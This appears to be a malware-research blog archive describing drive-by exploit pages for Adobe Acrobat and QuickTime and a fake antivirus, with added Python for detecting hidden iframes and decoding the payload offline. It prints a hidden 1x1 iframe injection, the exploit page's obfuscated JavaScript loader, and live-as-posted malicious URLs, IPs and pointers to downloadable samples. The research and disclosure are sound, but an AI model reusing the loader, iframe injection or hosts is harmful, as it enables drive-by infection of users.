Archive for the 'Video' Category

04 Oct

Another Adobe Acrobat Exploit (accwizm.exe)-VIDEO

Once again, we have an Adobe exploit page injecting another piece of malware. This one is different from the one posted earlier: it redirects through multiple pages, logging each visitor along the way. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the installed binary is almost fully undetected except for a few heuristic catches. Look below for more information about this exploit and about the binary. It can be downloaded from /pnuemo-malware/ in our repository.

BE ADVISED: All sites may be active. Proceed at your own risk.

The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php

This page contains a simple hidden iframe that loads a chain of pages, each of which logs the visitor.

<iframe src="http://megsrdomain.cn/tor/count.php?o=5" width=1 height=1 style="visibility: hidden"></iframe>

In the iframe we are redirected two times until we reach the exploit page.

hxxp://megsrdomain.cn/tor/count.php?o=5 -> hxxp://megsrdomain.cn/tor/count.php?o=2 -> hxxp://82.103.138.10/ls/?t=24
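A defender-side check for the hidden 1x1 iframe technique shown above, added here as an example (my code, not anything from the original post or from the sites involved). It parses a constructed landing page that embeds the iframe quoted above and flags iframes that are 0 or 1 pixel in size or hidden by style, noting whether their src points off-site; the page host passed in is the one from the URL above.

```python
# Added example: flag hidden / 1x1 iframes of the kind the post describes,
# using only the Python standard library so it runs offline.
from html.parser import HTMLParser
from urllib.parse import urlparse


class HiddenIframeFinder(HTMLParser):
    """Collect <iframe> tags whose size or style suggests they are meant to be invisible."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        reasons = []
        # 0 or 1 pixel wide/high: nothing a legitimate embed would use
        for dim in ("width", "height"):
            val = a.get(dim, "").strip().lower().removesuffix("px")
            if val.isdigit() and int(val) <= 1:
                reasons.append(f"{dim}={val}")
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden by style")
        if reasons:
            src = a.get("src", "")
            host = urlparse(src).hostname or ""
            self.findings.append({"src": src, "host": host, "reasons": reasons,
                                  "offsite": bool(host) and host != self.page_host})


def find_hidden_iframes(html, page_host):
    """Return one finding dict per suspicious iframe in the given HTML."""
    parser = HiddenIframeFinder(page_host)
    parser.feed(html)
    return parser.findings


# Constructed sample landing page; the first iframe is the one quoted in the post,
# the second is a normal-sized, same-host iframe that must not be flagged.
SAMPLE = """<html><body><p>loading...</p>
<iframe src="http://megsrdomain.cn/tor/count.php?o=5" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://66.232.117.33/video.html" width=640 height=480></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in find_hidden_iframes(SAMPLE, "66.232.117.33"):
        print(f["src"], "->", ", ".join(f["reasons"]), "(off-site)" if f["offsite"] else "")
```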

hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. It contains many, many pages of code, far too much to post here. You can view or download a clean .txt of the page code for this exploit by clicking here.

accwizm.exe
Result: 8/36 (22.22%)
MD5: 2bee943c7b8e63d17a92b99087ba15a7
VirusTotal
Sunbelt Sandbox

Download Video

06 Sep

Quicktime exploit page installs msupd_0809_upd070148.exe (VIDEO)

Here is an example of an exploit page. It checks the computer for certain vulnerable Quicktime browser objects; if one is found, it exploits the object, injects the malware onto the computer and executes it. We recorded a video of the website exploiting Quicktime and installing the malware on the system (at the bottom of the post). This binary is available in /pnuemo-malware/ in our repository. See the FAQ for access. As usual, proceed at your own risk because the links are still live as of this post date. One thing I will mention: when you visit the site, it logs your IP address, so on subsequent visits you'll get a 404.

This post is very long because of the code within the page, so to read everything, make sure to click through to the full post.

hxxp://inetppui.com/html/2440/f8ae8aedaf494548b681dedb37dd3d5f/

<script language=JavaScript>function f1(z0){var i,j,ff=0xff,z9=0xc,b=0x400,
r,z7=3,s=0,z8="ss",w=0,p=0,t=Array(63,62,58,34,3,30,47,43,40,6,0,0,0,0,0,
0,21,24,39,60,22,29,25,15,17,26,33,46,4,11,7,54,10,53,1,2,36,14,18,55,51,5,
16,0,0,0,0,27,0,61,59,8,48,37,9,0,19,13,41,31,23,20,57,44,52,28,38,42,32,50,
45,12,56,49,35);z2=z0;l=z2.length;for(j=Math.ceil(l/b);j>0;j--){r="";for(i=
Math.min(l,b);i>0;l--,i--){z1=t[z2.charCodeAt(p++)-48];z3=z1<<s;w|=z3;
if(s){z4=0xe7^w;z5=z4&ff;z6=z5;w=w>>8;s-=2;r=r+String.fromCharCode(z6)}
else{z7=8;s=6;z8="7";z9=w}}y1="document";y2="write";eval(y1+"."+y2+"(r)")}}
Continue reading ‘Quicktime exploit page installs msupd_0809_upd070148.exe (VIDEO)’
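The f1() function above is the whole obfuscation: each character of the long string argument is looked up in the 75-entry table t (indexed by character code minus 48), four characters yield three bytes, least significant bits first, and every byte is XORed with 0xe7 before document.write() executes the result. The following is an added example, my own re-implementation and not code from the post or the exploit page, so an analyst can recover the decoded HTML offline without ever letting a browser run it; the encode_f1() helper is only there to build round-trip test input.

```python
# Added example: the page's f1() decoder re-implemented so the obfuscated
# payload can be decoded offline instead of being executed by document.write().

# Copy of the 75-entry table from f1(); entry k is the 6-bit value of chr(48 + k).
T = [63,62,58,34,3,30,47,43,40,6,0,0,0,0,0,
     0,21,24,39,60,22,29,25,15,17,26,33,46,4,11,7,54,10,53,1,2,36,14,18,55,51,5,
     16,0,0,0,0,27,0,61,59,8,48,37,9,0,19,13,41,31,23,20,57,44,52,28,38,42,32,50,
     45,12,56,49,35]


def decode_f1(encoded):
    """Replicate f1(): 4 chars -> 3 bytes, LSB first, each byte XORed with 0xe7.
    f1() writes the output in 1024-char chunks, but 1024 is a multiple of 4, so
    decoding the whole string in one pass yields the same concatenated text."""
    out = bytearray()
    w = 0  # bit accumulator (the script's w)
    s = 0  # current shift (the script's s)
    for ch in encoded:
        if not 48 <= ord(ch) <= 122:  # outside '0'..'z' the script would index off the table
            raise ValueError(f"character {ch!r} is outside the decoder alphabet")
        w |= T[ord(ch) - 48] << s      # same lookup as t[charCodeAt(p++) - 48]
        if s:
            out.append((w ^ 0xE7) & 0xFF)  # z4 = 0xe7 ^ w; z5 = z4 & 0xff
            w >>= 8
            s -= 2
        else:
            s = 6                          # first character of a 4-char group
    return out.decode("latin-1")


def encode_f1(text):
    """Inverse of decode_f1(), used here only to build round-trip test input.
    Several table entries are 0; 'g' is chosen (an assumption) to encode value 0."""
    inv = {v: chr(48 + k) for k, v in enumerate(T) if v}
    inv[0] = "g"
    data = text.encode("latin-1")
    chars = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        n = 0
        for j, b in enumerate(chunk):
            n |= (b ^ 0xE7) << (8 * j)
        nchars = (len(chunk) * 8 + 5) // 6  # 3 bytes -> 4 chars, 2 -> 3, 1 -> 2
        chars.extend(inv[(n >> (6 * k)) & 63] for k in range(nchars))
    return "".join(chars)


if __name__ == "__main__":
    # First 16 characters of the encoded argument passed to f1() on the exploit page.
    print(decode_f1("_0xTPKAO_08t9UAO"))  # → <html><head>
```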

03 Sep

Antivirus 2009 (video)

Sites: hxxp://antivirusworld9.com -> hxxp://scanthnet.com -> hxxp://innovagest2000sl.com
Files: AV2009Install_*.exe (0570484B66E9A139D8FD0A71F5448957)
VirusTotal Result: 4/36 (11.11%)
MDB: /lithium-malware/AV2009Install.zip


Removal:

Remove this threat with MalwareBytes!
